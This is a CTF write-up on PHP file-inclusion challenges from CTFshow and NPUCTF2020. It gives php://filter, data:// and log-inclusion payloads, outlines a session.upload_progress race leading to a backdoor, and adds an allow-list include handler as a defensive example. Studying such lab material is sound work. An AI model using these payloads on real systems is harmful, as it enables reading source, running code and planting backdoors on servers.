CTFSHOW file inclusion challenges

  • Today's topic: reviewing file inclusion vulnerabilities

web 78

payload:

?file=php://filter/convert.base64-encode/resource=flag.php

web 79

payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

web 80-81

  • This challenge introduces a new trick
  • The source code filters the strings "php" and "data", so the php:// and data:// pseudo-protocols cannot be used
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
  • payload
?file=/var/log/nginx/access.log
  • Include the log file

web 82

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
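The web 80-82 sources show why a str_replace blocklist is the wrong fix: the filter only strips strings it knows about, while include() still accepts any path the attacker names, such as the nginx access log. As an added example, not code from the challenge, this is the allow-list form of the same handler; it assumes the includable pages live under a ./pages directory with the hypothetical names home, about and contact.

```php
<?php
// Added example (not from the original writeup): allow-list based include
// that replaces the str_replace blocklist seen in web 80-82.
// Assumption: includable pages live in ./pages/<name>.php (hypothetical names).
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

function resolveIncludePath(string $requested): ?string
{
    // 1. Accept only a short token of [a-z0-9_]. This rejects every stream
    //    wrapper (php://, data://), every '/', '.', ':' and NUL byte, so a
    //    log file or a session file can never be named at all.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $requested)) {
        return null;
    }
    // 2. The token must be one of the known pages; anything unknown is
    //    rejected outright instead of being "sanitised" and included.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // 3. Defence in depth: resolve the final path and confirm it is still
    //    inside PAGE_DIR (guards against a symlink placed in pages/).
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Related php.ini hardening (real directives): allow_url_include=Off keeps
// data:// and remote includes disabled; session.upload_progress.enabled=Off
// removes the session-file primitive used in the ezinclude challenge below.
if (isset($_GET['file'])) {
    $path = resolveIncludePath((string) $_GET['file']);
    if ($path === null) {
        http_response_code(400);
        exit('invalid page');
    }
    include $path;
} else {
    highlight_file(__FILE__);
}
```

A request such as ?file=/var/log/nginx/access.log or ?file=php://filter/... now fails at step 1 before include() is ever reached, which is the property the blocklist versions never had.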

Bonus challenge: [NPUCTF2020]ezinclude

  • A hint is given when entering the page
<!--md5($secret.$name)===$pass -->
  • After capturing the request, the hash value is passed directly in the URL
  • Then another hint is given: include($_GET["file"])
  • Try to read the source code: flflflflag.php?file=php://filter/convert.base64-encode/resource%3dflflflflag.php
<html>
<head>
<script language="javascript" type="text/javascript">
           window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
	die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>
  • With data, input and zip filtered, the pseudo-protocols cannot be used directly. Two methods come to mind: including a log file (but the path is unknown) and file inclusion via session.upload_progress
  • My solution is to use session.upload_progress to include a file and then exploit the race condition
  • POC
  • Access the temporary file
  • Race condition
  • Write a backdoor
  • POST parameter: cmd=phpinfo();
  • The flag is in phpinfo(); I searched through the directory files and only learned from the writeup that it is in phpinfo()

Source: blog.csdn.net/CyhDl666/article/details/115262796